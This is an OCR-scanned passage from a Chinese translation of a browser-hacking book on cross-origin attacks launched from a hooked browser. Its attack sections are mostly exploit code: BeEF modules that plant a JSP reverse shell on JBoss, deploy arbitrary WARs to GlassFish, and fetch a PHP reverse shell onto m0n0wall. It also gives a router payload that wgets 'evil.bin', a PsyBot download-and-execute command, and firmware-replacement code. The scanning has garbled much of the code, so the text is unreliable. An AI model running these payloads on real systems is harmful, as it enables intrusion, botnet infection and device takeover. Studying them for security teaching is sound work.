$2Fconsole-mgr.sar/web-console.war$2F&argl-" + jspName + "&arg2=.jsp\ 
&arg3-" + payload + "&arg4=True"; 


/* 跨 源 XHR 必 须 指 定 dataType : 'script' 
* 否则 即使 HTTP 响 应 200，jQuery .ajax 也 会 报错 
A 
beef.net.forge request("http", "HEAD", rhost, rport, uri, null, null, 
null, 10, 'script', true, null,function(response) { 
if(response.status code == 200) { 
function triggerReverseConn()( 
beef.net.forge request("http", "GET", rhost, rport,"/web-console/" + 


jspName + ".jsp", null, null, null, 10, 'script', true, null,\ 
function(response) { 


if(response.status code == 200) { 
beef.net.send("<%= @command_url %>", <%= @command_id %>, 
“Reverse JSP shell triggered. Check your MSF handler listener."); 
Jelse{ 
beef.net.send("<%= @command_url %>", <%= @command_id %>, 


“ERROR: second GET request failed."); 


y) 


// 给 JBoss 部 署 JSP 反 向 she11 留 出 时 间 
setTimeout (triggerReverseConn,10000); 


yelse{ 
beef.net.send("<%= @command_url %>", <%= @command_id %>, 
“ERROR: first HEAD request failed."); 
j 
E 




















1); 
以 上 JSP 反 弹 shell 代 码 是 在 Metasploit 反 弹 JSP shell 代 码 的 基础 上 修改 而 成 的 。 其 中 的 9 
payload 变 量 包 含 URL 编 码 的 JSP 源 代码 ， 以 下 是 解码 后 的 结 


<%@page import="java.lang.*"%> 





























<%@page import="java.util.*"%> 

<%@page import="java.io.*"%> 

<%@page import="java.net.*"%> 

<% class StreamConnector extends Thread { 
InputStream is; OutputStream os; 
StreamConnector( InputStream is, OutputStream os ) { 
this.is = is; this.os = os; 
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} 


public void run() { 
BufferedReader in = null; 
BufferedWriter out = null; 
try ( 
in new BufferedReader (new InputStreamReader (this.is)) 


out = new BufferedWriter (new OutputStreamWriter(this.os)); 
char buffer[] = new char[8192]; 

int length; 

while((length = in.read(buffer, 0, buffer.length)) > 0 ){ 

out.write(buffer, 0, length); out.flush(); 

y 
)catch( Exception e )() 


try { 

it( in i= null.) 
in.close(); 

if( out != null ) 


out.close(); 

)catch( Exception e )() 
} 
j 


try { 

Socket socket - new Socket(lhost,lport); 

Process process = Runtime.getRuntime().exec(injectedCommand); 
(new StreamConnector(process.getInputStream(), 
Socket.getOutputStream())).start(); 

(new StreamConnector(socket.getInputStream(), 
process.getOutputStream())).start(); 


) catch(Exception e)() 
> 


整个 利用 涉及 两 个 阶段 。 


oe 





a 第 一 阶段 是 发 送 HEAD 请 求 , 附加 编码 后 的 JSPpayload , 目标 URI 为 /jmx-console/HtmlAdaptor; 
indexjsp。 其 中 的 MBean ( 托管 Bean ) DeploymentFileRepository 用 于 将 这 个 JSP 部 署 到 





JBoss, 




















O 第 二 阶段 是 HEAD 请 求 成 功 ， 并 在 10 秒 后 调用 EriggerReverseconn O 。 之 所 以 延 后 10 
秒 ， 是 为 了 让 JBoss 有 足够 的 时 间 部 署 JSP 页 面 。 调 用 上 述 函 数 ， 会 向 刚刚 部 署 完 的 JSP 页 
面 发 送 一 个 GET 请 求 。 这 一 步 是 触发 反弹 连接 所 必需 的 ,指向 的 是 lhost 和 1port 变 量 中 





指定 的 Metasploit 监 听 需 。 
































如 果 这 个 利用 执行 成 功 ， 就 会 有 一 个 以 JBoss 用 户 身份 运行 的 反弹 Shell。 可 以 访问 https://bro- 
wserhacker.com， 通 过 观看 视频 来 了 解 这 种 攻击 的 具体 过 程 。 


9.10.3 GlassFish 跨 域 远程 命令 执行 





与 JBoss 类 似 ，GlassFish 也 是 一 个 Java 应 用 服务 器 。Roberto Suggi Liverani 发 现 ( CVE-2012- 
0550) ?", GlassFish 3.1.1 的 REST API 并 没有 任何 防御 XSRF 的 token。 在 GlassFish 中 ， 可 以 伪装 成 
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一 个 认证 过 的 管理 员 ， 在 GlassFish 服 务 器 上 静默 部 署 一 个 WAR， 就 可 以 达到 与 前 面 利用 JBoss 漏 
洞 同 样 的 效果 。 

下 面 的 代码 来 自 Bart Leppens 编 写 的 一 个 BeEF 模 块 ， 可 用 于 在 GlassFish 中 部 署 任意 WAR， 并 
以 GlassFish 用 户 身 份 执 行 命令 。 这 种 利用 的 最 有 意思 之 处 ,在 于 使 用 XMLHt tpRequest 对 象 跨 域 
发 送 多 部 分 POST 请 求 ， 这 是 由 Krzysztof Kotowicz 发 现 的 


beef.execute(function() { 
var restHost = '<%= @restHost %>'; 
var warName = ' 




















$= @warName %>'; 
var warBase = '<%= @warBase %>'; 

var logUrl = restHost + '/management/domain/applications 
/application'; 


if (typeof XMLHttpRequest. prototype.sendAsBinary == 
'undefined' && Uint8Array) { 
XMLHttpRequest.prototype.sendAsBinary - function(datastr) ( 
function byteValue(x) ( 
return x.charCodeAt(0) & Oxff; 
) 
var ords - Array.prototype.map.call(datastr, byteValue); 
var ui8a - new Uint8Array (ords); 
this.send(ui8a.buffer); 


} 


function fileUpload(fileData, fileName) { 
boundary = "BOUNDARY270883142628617", 
uri s-logUrl, 
xhr - new XMLHttpRequest(); 


var additionalFields - ( 
asyncreplication: "true", 
availabilityenabled: "false", 
contextroot: "", 
createtables: "true", 
dbvendorname: "", 
deploymentplan: "", 
description: "", 
dropandcreatetables: "true", 
enabled: "true", 
force: "false", 
generatermistubs: "false", 
isredeploy: "false", 
keepfailedstubs: "false", 
keepreposdir: "false", 
keepstate: "true", 
lbenabled: "true", 
libraries: "", 
logReportedErrors: "true", 
name: "", 
precompilejsp: "false", 
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‘Attempt to deploy \"' 


"an 
" 


properties: 
property: "", 
retrieve: 
target: "", 
types "t, 
uniquetablenames: 
verify: "false", 
virtualservers: 
remove empty entries 


un 
" 


"true", 


"n 
" 


"true™ 





var fileFieldName = "id"; 
xhr.open("POST", uri, true); 
xhr.setRequestHeader("Content-Type", 
boundary="+boundary) ; 
xhr.withCredentials "true"; 
xhr.onreadystatechange function() { 
if (xhr.readyState == 4) { 
beef.net.send('<%= @command_url 
+ warName + '\" 


ay 
o> 


} 


var body = 


"n. 
7 


for 
XE 


(var i in additionalFields) { 


body += addField(i, 


body += addFileField(fileFieldName, 
body += "--" + boundary + "--"; 
xhr.setRequestHeader('Content-length' 
xhr.sendAsBinary (body); 

return true; 


completed. 


(additionalFields.hasOwnProperty(i)) { 
additionalFields[i] 


fileData, 


"multipart/form-data; 


// simulate a file MIME POST request. 


, <%= Qcommand id %>, 


"yx 


, boundary); 


fileName, boundary); 


, body.length); 


function addField(name, value, boundary) ( 
var c = "--" + boundary + "\r\n" 
C += 'Content-Disposition: form-data; name="' + name +'"\r\n\r\n'; 
C += value + "Arn"; 
return C; 
} 
function addFileField(name, value, filename, boundary) { 
var c = "--" + boundary + "\r\n" 
C += 'Content-Disposition: form-data; name="' + name + 
; filename-"' + filename + '"\r\n'; 
c += "Content-Type: application/octet-stream\r\n\r\n"; 


c += atob(value); 
QC MENDI 
return C; 
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} 


fileUpload(warBase,warName) ; 


Ly 
fileUpload () PAZ B c PA RC. warBase 是 以 base64 格 式 编 码 的 需要 部 署 的 WAR , 
warName 是 给 这 个 WAR 文 件 随 便 起 的 一 个 名 字 。 第 一 步 是 扩 代 additionalFields 这 个 JSON 结 构 ， 对 
其 中 的 每 个 键 - 值 添加 对 应 的 Content-disposition: form-data 首 部 ,这 些 键 - 值 是 在 URI 为 /management/ 
domain/applications/application 的 路 径 下 ， 使 用 GlassFish 的 RESTAPI 时 默认 要 有 的 。 
接 下 来 会 解码 base64 编 码 的 WAR 内 容 ， 并 将 其 添加 到 POST 请 求 体 的 最 后 ， 指 定 内 容 类 型 为 
Content-Type: application/octet-stream, 因为 内 容 是 二 进 制 的 。 
在 此 阶段 ，multipart/form-daata 这 个 POST 请 求 已 创建 ， 并 准备 好 了 被 发 送 到 有 漏洞 的 
Glassfish 应 用 服务 器 。 别 忘 了 ，WAR 的 内 容 是 二 进 制 数据 。 
然而 , 在 使 用 XMLHttpReauest 对 象 发 送 二 进 制 数据 时 ,并 非 所 有 浏览 器 的 行为 都 一 致 。 比 
如 , Firefox 中 的 xMLHttpRequest 对 象 会 调用 更 可 靠 的 sengdAsBinary () 方 法 ?。 而 其 他 非 Gecko 
浏览 器 都 没有 相同 的 功能 ， 至 少 在 本 书写 作 时 还 是 如 此 。 
同样 ， 如 果 支 持 有 类 型 的 数组 ， 那 么 可 以 覆盖 sendqaAsBinary () 的 原型 和 Array 对 象 , 在 非 
Gecko 浏 览 嚣 中 模拟 相应 的 行为 。 对 sengAsBinary () 代 码 的 改进 如 下 : 
if (typeof XMLHttpRequest.prototype.sendAsBinary == 
'undefined' && Uint8Array) { 
XMLHttpRequest.prototype.sendAsBinary - function(datastr) ( 
function byteValue(x) ( 
return x.charCodeAt(0) & Oxff; 
j 
var ords - Array.prototype.map.call(datastr, byteValue); 
var ui8a - new Uint8Array (ords); 


this.send(ui8a.buffer); 


} 

























































































j 
使 用 本 章 前 面 介绍 的 一 种 用 于 检测 不 同 HTTP 状 态 码 的 登录 检测 技术 ， 可 以 确定 色 连 浏览 
是 否 通过 了 GlassFish 的 管理 员 身 份 认证 。 如 果 通 过 了 ， 就 可 以 发 起 利用 。 如 果 利 用 成 功 ， 就 会 有 
一 个 以 GlassFish 用 户 身份 运行 的 shell 在 你 手中 ， 接 下 来 干什么 就 看 你 了 。 
可 以 访问 https://browserhacker.com， 通 过 观看 视频 来 了 解 这 种 攻击 的 具体 过 程 。 






































9.10.4 mOnOwall 跨 域 远程 命令 执行 


舱 入 式 防火 墙 m0n0wall 是 基于 FreeBSD 的 ， 可 用 在 Soekris 主 板 或 过 时 的 PC 等 租 入 式 设备 中 。 
m0n0wall 的 Web 管 理 界 面 存在 一 个 缺陷 ， 可 以 利用 身份 验证 漏洞 利用 ， 类 似 于 GlassFish 的 例子 。 
Yann Cam 发 现 ”，m0n0wall 1.33 及 更 早 版 本 的 Web 管 理 界面 没有 设置 XSRF 保 护 机 制 。 

这 个 Web 管 理 界 面 功能 很 多 ， 包 括 以 root 和 角色 执行 原始 命令 。 为 了 成 功利 用 ， 要 使 用 一 个 略 
有 不 同 的 m0n0wall 资 源 exec_raw.php， 因 为 它 执行 的 是 原始 PHP 代 码 ， 所 以 会 更 加 灵活 。 为 了 可 
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靠 性 起 见 ，BeEF 中 利用 这 个 漏洞 的 模块 采用 了 Mark Lowe4 的 PHP shell。shell 与 Netcat 监 听 器 之 间 
建立 的 连接 非常 稳定 。 而 且 shell 还 是 交互 式 的 ， 可 以 执行 各 种 渗透 测试 。 
以 下 代码 展示 了 如 何在 勾 连 浏览 右 中 利用 已 认证 的 m0n0wall Web 管 理 界 面 : 


beef.execute(function() { 





























var rhost = '<%= @rhost %>'; 
var rport = '<%= @rport %>'; 
var lhost = '<%= @lhost %>'; 
var lport = '<%= @lport %>'; 
var uri = "http://" + rhost + ":" + rport + "/exec_raw.php? \ 


emd=echo%20-e%20%22%23%21%2Fusr%2Flocal$2Fbin%2Fphp%5Cn%3C%3Fphp%20 \ 
eval$28$27$3F$3E$20227.file get contents228227http$3A$2F$2F" + \ 
beef.net.host + ":" + beef.net.port + "$2Fphp-reverse-wN 
shell.php$272$29.$2723C$3Fphp$202$272$292$3B2$202$3F23E2$22220$3E220 \ 
x.php$3Bcat20x.php$3Bchmod220755220x.php$3B"; 


beef.net.forge request("http", "GET", rhost, rport, uri, null, 
null, null, 10, 'script', true, null, function(response) { 
if(response.status code == 200) { 
function triggerReverseConn() { 
beef.net.forge request("http", "GET", rhost, rport, 
"/x.php?ip-" + lhost + "&port=" + lport, null, null, null, 10, 
'Script', true, null,function(response)( 
if(response.status code == 200) { 


beef.net.send("<%= @command_url %>", <%= 
Gcommand id %>,"result=OK: Reverse shell should have been triggered. 
jelset 
beef.net.send("«$- Gcommand url %>", <%= 
Gcommand id %>,"result=ERROR: second GET request failed."); 
} 
3): 





} 
setTimeout (triggerReverseConn,5000); 
jelse{ 
beef.net.send("<%= @command_url %>", <%= @command_id 
%>,"result=ERROR: first GET request failed."); 
} 
}); 


s 
这 段 代码 对 uri 变 量 的 内 容 进 行 了 URL 编 码 ， 使 用 了 所 有 m0n0wall 默 认 安 装 都 有 的 exec_raw. 








php: 


/exec_raw.php?cmd=echo -e "#!/usr/local/bin/php\n \ 
<?php eval('?> '.file get contents('http://" + \ 
beef.net.host + ":" + beef.net.port + \ 
"/php-reverse-shell.php').'«?php '); ?>" > \ 
x.php;cat x.php;chmod 755 x.php; 


BeEF 服 务 器 上 反弹 shell 的 内 容 , 使 用 PHP 的 file_get contents 取 得 。 然 后 将 取得 的 内 容 添 加 到 
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目标 上 的 x.php 文 件 ， 之 后 这 个 文件 的 权限 就 被 修改 了 。 这 个 阶段 是 在 第 一 个 GET 请 求 时 发 生 的 。 
在 此 期 间 ， 会 有 一 个 简单 的 Netcat 套 接 字 ， 监 听 你 的 机 器 上 的 Ihost 和 lpost。 为 了 触发 这 个 反 
单 shell 连 接 ， 会 发 送 第 二 个 GET 请 求 , 请 求 之 前 创建 的 x.php 文 件 。 如 果 利 用 成 功 ,你 应 该 可 以 获 
得 这 台 m0nowall 设 备 的 远程 root 访 问 权 限 。 
这 里 m0nowall 的 Web 管 理 界 面 有 漏洞 , 是 因为 缺乏 XSRF 保 护 机 制 , 因此 Web 应 用 才 会 信任 跨 
域 请 求 。 另 外 , 利用 成 功 还 有 赖 于 目标 登录 到 应 用 ， 而 登录 与 否 可 以 使 用 本 章 前 面 讨论 的 技术 确 
定 。 可 以 访问 https:/browserhackercom， 通 过 观看 视频 来 了 解 这 个 攻击 的 具体 过 程 。 


9.10.5” 瞬 入 式 设 备 跨 域 命令 执行 


家 用 路 由 器 通常 运行 的 是 Linux 的 垦 入 式 版 本 ， 而 且 经 常 是 MIPS 架 构 。BusyBox 这 种 由 常用 
UNIX 实 用 程序 编译 而 来 的 小 型 可 执行 文件 ， 经 常 可 见于 这 类 机 和 信 式 设备 。 

如 果 你 能 够 利用 远程 命令 执行 漏洞 ， 那 就 可 以 利用 BusyBox ， 以 更 直接 的 方式 打 入 相应 的 路 
由 需 内 部 。 

1. 预 认证 远程 命令 执行 

Michal Sajdak 曾 讨论 过 “， 波 兰 流行 的 一 款 路 由 器 Asmax AR 804。 这 款 路 由 器 可 以 使 用 RCE 
预 认 证 加 以 利用 。 下 面 的 JavaScript 代 码 演示 了 如 何 利 用 其 缺陷 : 
















































































var gateway = '192.168.0.1'; 
var path = 'cgi-bin/script?system%20'; 
var cmd = 'wget$20http$3A22F£2Fbrowserhacker.com 


S2Fevil .bin%20-P%20%2Fvar%2Ftmp'; 


var img = new Image(); 
img.setAttribute("style","visibility:hidden"); 
img.setAttribute("width","0"); 
img.setAttribute("height","0"); 

img.id - 'asmax ar804gu'; 

img.src = gateway+path+cmd; 
document.body.appendChild(img); 


wget 可 以 在 路 由 器 中 使 用 ， 而 这 段 代 码 借助 它 把 evil.bin 从 browserhacker.com 下 载 到 /var/tmp 
文件 夹 中 。 更 严重 的 是 ， 这 款 路 由 器 中 的 每 一 个 进程 ， 包 括 Web 服 务 需 ， 都 以 root 权 限 在 运行 ， 
如 图 9-37 所 示 。 

包括 直接 访问 路 由 器 的 BusyBox 界 面 在 内 的 RCE 漏 洞 已 经 被 广 为 利 用 。2008 年 出 现 了 最 早 的 
名 为 PsyBot 的 僵尸 网 络 ， 是 通过 SOHO 路 由 器 炮制 出 来 的 。 根 据 Terry Baume 的 描述 ”， 这 个 僵尸 
网 络 主要 由 Netcom NB5 路 由 器 构成 。 

这 些 路 由 需 中 的 一 个 很 流行 的 固件 版 本 ,未 对 Web 用 户 界面 实施 任何 强制 认证 ， 从 而 导致 攻 
击 者 可 以 通过 Telnet 远 程 管理 路 由 器 。Telnet 连 接 之 后 ， 就 会 执行 图 9-38 中 写 在 注释 里 的 攻击 。 
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Plik Edycja Widok Historia  ZaMadk Narzedzia Pomoc 





4 ~ Q X d (D |hpunsz.169.1.1/co-biniscrpt?systempsaux — 


国 Często odwiedzane > Pierwsze kroki A.) Aktualności 
Proxy: [None E] w Apply 7 Edt WB) Remove [Jadd (Status: UsingNone} $ preferences 





PID Uid VmSize Stat Command 
root 1304 init 
root [keventd] 
root [ksoftirqd CPU0] 
root [kswapd] 
root [bd£lush] 
root [kupdated] 
root [ntdblockd] 
root /usr/bin/cm pc 
root init 
root /usr/sbin/thttpd -d /usr/www -u root -p 80 -c /cgi-b 
root /usr/bin/cm logic -m /dev/ticfg -c /etc/config.xml 
root /usr/bin/cm klogd /dev/klog 
root /usr/sbin/snmpd 
root /usr/sbin/udhcpd /var/tmp/udhcpd.conf 
root /sbin/dproxy -c /etc/dproxy.conf -d 
root /bin/sh script system ps aux 
root f/usr/sbin/thttpd -d /usr/www -u root -p 80 -c /cgi-b 
root /bin/ps aux 


HJ) tco tn tQ Un tn tn tn (0 tO to Co t0 tU) Uo (0 tn Un 











图 9-37 ”Asmax 路 由 器 上 的 每 个 进程 都 以 root 权 限 运 行 





# wget http://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/ 
tmp/udhcpc.env && /var/tmp/udhcpc.env & 
Set PR mark for socket 0x7 = 239 


udhcpc.env 100% kx iei | 33744 
00:00 ETA 
# 





图 9-38 ”PsyBot 感 染 了 第 一 条 命令 


图 9-38 展 示 了 以 下 过 程 : 

O 通过 wget 把 udhcpc.env 文 件 下 载 到 /var/tmp 文 件 夹 ; 
口 然后 通过 chmod 命 令 将 该 文件 变 成 可 执行 文件 ; 

口 然后 该 文件 在 后 台 执 行 。 

这 个 可 执行 文件 是 针对 MIPS 架 构 编 译 的 , 执行 以 后 会 连接 到 一 个 IRC 命 令 , 并 控制 攻击 者 运 
行 的 全 局 僵尸 网 络 服务 器 。 同 样 的 攻击 向 量 也 可 以 用 于 前 面 介绍 的 针对 Asmax 路 由 需 RCE 漏 洞 的 
攻击 ， 这 是 因为 它 是 预 认 证 的 ， 并 且 所 有 命令 都 会 以 root 权 限 运行 。 

最 近 后 通过 SOHO 路 由 器 爆发 的 僵尸 网 络 包括 Chuck Norris 变 体 ,影响 范围 涉及 2009 年 和 2010 
年 左右 的 很 多 MIPS 架 构 的 般 入 式 Linux 设 备 。 可 惜 的 是 ， 这 种 变 体 的 名 字 并 没有 以 Chuck Norris 
攻击 的 路 由 器 来 命名 。 马 萨 里 克 大 学 研究 人 员 发 现 了 源 代 码 中 的 一 行 意大利 语 注释 : [Ranger 
killato: in nome di Chuck Norris ( 翻译 过 来 就 是 “哨兵 已 死 ， 杀 人 者 Chuck Norris” ) ^, 
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2. 固件 替换 远程 命令 执行 

另 一 种 完全 控制 路 由 器 的 方式 , 是 用 你 的 固件 替换 路 由 吉 的 固件 , 这 是 破坏 路 由 咒 核 心 的 终 
极 方式 。 而 且 ， 安 装 了 你 自己 的 固件 之 后 ， 还 可 以 阻止 固件 的 升级 。 

Phil Purviance 在 BlackHat 2012 上 展示 了 一 种 替换 各 种 Linksys 设 备 中 固件 的 技术 , 这 些 设备 都 
存在 XSRF 漏 洞 。 这 种 利用 技术 可 以 跨 域 发 挥 作用 ， 原 理 与 前 面 讨 论 GlassFish 时 使 用 的 Krzysztof 
Kotowicz 发 明 的 技术 相同 。 以 下 代码 演示 了 这 一 技术 : 

function fileUpload(url, fileData, fileName) { 

var fileSize = fileData.length, 

boundary = TARAS a raos sa oases ET 
"168072824752491622650073", xhr - new XMLHttpRequest; 
xhr.open("POST", url, true); 

xhr.withCredentials - "true"; 


xhr.setRequestHeader("Content-Type", 
"multipart/form-data, boundary=" + boundary); 





























// 保证 multipatrt 的 POST 主体 格式 正确 
var body = boundary + "\r\n"; 
body += "Content-Disposition: form-data; " + 
"name=\"submit_button\"; name=\"submit_button\" \r\n\r\nUpgrade\r\n"; 
body += boundary + "\r\nContent-Disposition: " + 
"form-data; name=\"change_action\"\r\n\r\n\r\n"; 
body += boundary + "\r\nContent-Disposition: " + 
"form-data; name=\"action\"\r\n\r\n\r\n"; 
body += boundary + "\r\nContent-Disposition: " + 
"form-data; name=\"file\"; " + 
"filename=\"FW_WRT54GL_4.30.15.002_US_20101208_code.bin\"\r\n"; 
body += "Content-Type: application/macbinary\r\n"; 
body += "\r\n" + fileData + "\r\n\r\n"; 
body += boundary + "\r\nConntent-Disposition: " + 
"form-data; name=\"process\"\r\n\r\n\r\n"; 
body += boundary + "--"; 





// 非 Gecko 浏 览 器 (如 Chrome) WA sendAsBinary 
if (navigator.userAgent .toLowerCase().indexOf("chrome") > -1) { 
XMLHttpRequest .prototype.sendAsBinary = function(datastr) { 
function byteValue(x) { 
return x.charCodeAt (0) & 255 
} 
var ords = Array.prototype.map.call(datastr, byteValue); 
var ui8a = new Uint8Array (ords); 
this.send(ui8a.buffer) 
} 
} 
xhr.sendAsBinary (body) ; 
return true 


} 





// 调用 fileUpload() 传 递 固件 内 容 
fileUpload("http://192.168.0.1/upgrade.cgi", 
"[..firmware binary..]", "myFile.gif"); 
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执行 这 些 代码 ,就 可 以 使 用 原始 数据 更 新 Linksys WRT54GL 的 固件 ,这 些 原始 数据 是 作为 第 
二 个 参数 传人 fileUpload() 函数 的 。 

修改 已 有 路 由 器 的 固件 并 打开 后 门 ， 并 不 像 想 象 中 那么 难 ， 只 要 找 对 工具 就 行 。 

Craig Heffner 是 binwalk 的 作者 ， 他 与 Jeremy Collake 共 同 写 了 Firmware Modification Kit 6, 
这 是 一 套 Bash 脚 本 ， 可 以 用 于 解 包 路 由 器 固件 ,以 获取 文件 系统 的 文件 树 。 然 后 你 可 以 依次 读 取 
每 个 文件 ， 并 向 其 中 注入 后 门 代码 ， 最 后 再 将 它们 重新 打包 成 一 个 文件 ， 用 于 前 面 提 到 的 攻击 。 

Robert Kornmeyer 在 2013 年 年 中 发 表 了 一 篇 关于 PaulDotCom“ 的 文章 ， 描 述 了 使 用 Firmware 
Modification Kit， 针 对 Linksys 路 由 器 给 DD-WRT 固 件 开 后 门 的 过 程 。 他 可 以 修改 Info.htm 页 面 源 ， 
包含 BeEF hook， 如 图 9-39 所 示 。 








(e)"submitFooter"» 


{m} 
//<! [CDATA[ 


var autoref = <% nvram_else_match("refresh_time","0","sbutton.refres","sbutton.autorefresh" 
submitFooterButton(0,0,0,autoref); 


(n) "floatKiller"»«/div» 
(n)"statusInfo"» 
{e}"info"><% tran("share.firmware"); %>: 


'" + share.about + "X" href=\"javascript :openAboutWindow()\"><% get_firmware_ 


{e}"info"><% tran("share.time"); %>: <span id="uptime"><% get uptime(); %></span></div> 
{e}"info">WAN<span id="ipinfo"><% show wanipinfo(); %></span></div> 

















19-39 用 BeEF 色 连 给 DD-WRT 开 了 后 门 


同样 的 攻击 向 量 对 任何 暴露 Web 界 面 的 网 络 设备 都 有 效 ， 不 限于 路 由 器 。 利 用 XSS 、 基 本 认 
证 和 CSRF 漏 洞 ， 可 以 非常 容易 地 对 NAS 设 备 、 交 换 机 、 监 控 摄 像 头 、 媒 体 播放 器 等 进行 未 授权 
更 改 。 佑 计 大 家 也 知道 ，BeEF 包 含 非常 丰富 的 命令 模块 ， 用 于 解决 各 种 问题 。 粗 略 地 分 ， 可 以 
分 为 针对 攻击 摄像 头 、NAS 设 备 及 路 由 器 的 模块 。 
摄像 头 模块 意图 利用 缺陷 ， 以 更 新 DLink 和 Linksys 系 列 设 备 中 的 管理 员 赁 证。 比如 ， 攻 击 
AirLive 摄 像 头 的 时 候 ， 这 个 模块 会 添加 一 个 新 的 管理 员 。 

NAS 利 用 模块 以 DLink 和 FreeNAS 设 备 为 目标 。DLink 的 CSRF 缺 陷 允 许 远程 代码 执行 ， 而 
FreeNAS 设 备 中 的 CSRF 缺 陷 ， 可 以 用 于 创建 一 个 反弹 shell 给 你 的 计算 机 。 
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路 由 器 利用 模块 可 以 攻击 3Com、Belkin 、Cisco 、DLink 、Linksys 和 Comtrend 设 备 。 对 于 其 
中 多 数 设备 ， 都 会 尝试 利用 CSRF 缺 陷 ， 以 修改 管理 员 密码 或 者 启用 远程 访问 ， 跟 前 面 讨 论 的 差 
不 多 。 

图 9-40 展 示 了 攻击 网 关 设备 的 另 一 个 有 用 的 资源 : http://www.routerpwn.com。Routerpwn 是 
Roberto Salgado 创 建 的 项 目 ， 收 集 了 大 量 以 家 用 路 由 器 为 攻击 目标 的 HTML 和 JavaScript 代 码 。 利 
用 这 些 代 码 ， 几 乎 任何 人 在 任何 地 方 都 可 以 攻击 别人 的 路 由 器 。 攻 击 手 段 按 照 路 由 器 厂商 分 类 ， 
比如 Belkin、Cisco、 华 为 、Netgear， 等 等 。 这 个 网 页 本 身 就 是 一 个 HTML 文 件 ， 可 以 下 载 下 来 在 
不 能 上 网 的 时 候 离 线 运行 。 
















































































2Wire 
3Com 


Netgear 
Pirelli 
RuggedCom 
Sagem 
Seagate 
Siemens 
Sitecom 
Thomson 
TP-Link 


图 9-40 Routerpwn: www.routerpwn.com 


本 节 介 绍 的 攻击 技术 展示 了 网 络 路 由 器 有 多 脆弱 ， 特 别 是 那些 个 人 家 庭 中 常用 的 SOHO 设 
备 ， 尤 其 没有 安全 可 言 。 这 背后 的 主要 原因 ， 应 该 是 人 们 都 选择 相信 路 由 器 厂商 会 保障 Web 用 
户 界 面 的 安全 。 换 句 话 说， 就 是 认为 在 内 部 网 中 运行 的 Web 界 面 对 互 联网 上 的 黑客 来 说 是 难以 
企及 的 。 

这 种 假设 一 旦 面临 内 部 网 中 某 个 浏览 器 被 攻击 者 所 控制 的 局 面 ,就 会 像 纸 牌 屋 一 样 坦 塌 。 此 
时 ， 路 由 需 可 以 被 重新 配置 ， 完 全 换 心 ， 甚 至 成 为 僵尸 网 络 的 一 个 节点 。 
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本 章 介 绍 了 可 以 通过 勾 连 浏览 需 对 Web 应 用 发 起 的 各 类 攻击 ,其 中 很 多 是 跨 域 执行 而 又 不 违 
反 SOP 的 。 如 果 你 是 一 个 攻击 者 ,掌握 这 些 技术 之 后 ， 就 可 以 进一步 伪装 隐蔽 自己 ， 并 访问 那些 
位 于 内 部 网 中 不 能 路 由 到 的 Web 应 用 。 
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我 们 还 讨论 了 如 何 识别 和 利用 跨 域 漏洞 ， 包 括 RCE 、SQL 注 入 和 XSS 攻 击 。 

经 过 学 习 ， 相 信 大 家 已 经 知道 了 怎么 通过 ( 跨 域 发 现 的 ) XSS 漏 洞 匀 连 目标 源 ， 进 而 扩大 自 
己 能 够 控制 的 攻击 面 。 有 了 勾 连 之 后 ， 就 可 以 通过 Tunneling Proxy 访 问 这 个 刚 被 控制 的 源 ， 从 而 
可 能 利用 到 认证 会 话 ， 并 绕 过 一 些 使 用 HttpOnly 的 防御 措施 。Burp 和 Sqlmap 等 标准 的 安全 工具 ， 
也 可 以 使 用 Tunneling Proxy 通 过 勾 连 浏览 器 发 送 请 求 。 

这 一 章 还 展示 了 能 够 跨 域 发 起 标准 的 Web 应 用 攻击 。 这 些 攻击 可 以 利用 内 部 网 设备 中 的 RCE 
漏洞 。 

下 一 章 ， 我 们 继续 围绕 内 部 网 中 的 勾 连 浏览 器 展开 讨论 。 但 攻击 目标 是 一 些 非 Web 服 务 , 使 
用 的 方法 涉及 内 部 协议 通信 与 利用 等 。 
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9.12 问题 


(1) 什么 是 前 置 请 求 ? 

(2) 跨 域 Web 应 用 指纹 采集 的 原理 是 什么 ? 它 违反 同 源 策略 吗 ? 

(3) 如 何 盲 勾 连 一 个 新 域 ? 请 举 一 个 例子 。 

(4) 有 什么 方法 可 以 检测 用 户 是 否 登 录 到 了 Web 应 用 ,但 同时 又 不 违反 同 源 策略 ? 

(5) 为 什么 XSRF 漏 洞 加 上 路 域 请 求 可 能 造成 毁灭 性 打击 ? 伪 随 机 防御 XSRF token 又 如 何 防 
范 它 ? 

(6) 能 够 不 违反 同 源 策略 跨 域 检测 的 SQL 注入 是 哪 种 ? 

(7) 如 何 通 过 勾 连 浏览 器 代理 HTTP 请 求 ? 

(8) 描述 一 下 本 章 最 后 一 节 介 绍 的 GlassFish 利 用 ( CVE-2012-0550 ) 的 原理 。 有 没有 什么 注意 
事项 ? 

(9) 如 何 利 用 允许 来 自 所 有 域 请 求 的 宽松 的 跨 域 策略 ? 描述 现实 中 的 一 个 例子 。 

(10) 请 讲 一 个 Web 应 用 痛 点 的 例子 。 

要 查看 问题 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers ， 或 者 Wiley 的 网 站 
http://www.wiley.com/go/browserhackershandbook。 
































于 育 注 吗 ? 
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不 要 忘 了 本 书 里 时 不 时 就 会 讨论 到 的 支持 应 用 协议 的 底层 环境 和 技术 ,HTTP 对 底层 OSI 分 层 
模型 的 依赖 程度 ， 与 应 用 层 中 定义 的 其 他 协议 是 一 样 的 。 
关注 攻击 浏览 器 和 Web 应 用 是 一 件 事 ,而 深入 底层 网 络 又 会 为 你 打开 另 一 番 新 天 地 。 只 有 在 
网 络 层 才 能 直接 访问 那些 非 HTTP 服 务 ， 包 括 电 子 邮 件 、 打 印 、IRC (Internet Relay Chat ) 等 。 
re de ee 内 部 网 络 配 置 开始 。 换 句 话 说 ,就 是 检测 内 部 IP 地 址 ， 并 
进行 端口 扫描 。 获 得 这 些 信息 后 ， 就 可 以 使 用 一 些 更 高 级 的 技术 ， 比 如 IPC ( Inter-protocol 
Communication， 协 议 间 通信 ) ae ( Inter-protocol Exploitation, Hpi la] FIFA )。 
当然 ,在 使 用 IPE 俘 获 某 个 目标 后 ， 需 要 让 它 连 接 到 你 控制 的 设备 。 和 常规 的 反 向 连接 会 涉及 
通过 边界 防火 墙 的 噪声 通信 。 我 们 还 会 介绍 一 个 通过 BeEF Bind payload 回 连 的 更 隐秘 的 方式 ， 用 
它 把 数据 反弹 到 你 勾 连 的 浏览 需 


10.1 识别 目标 


在 尝试 对 系统 或 网 络 进行 非 授权 访问 之 前 ， 首 先 要 做 的 就 是 侦察 。 如 果 攻 击 目标 是 浏览 
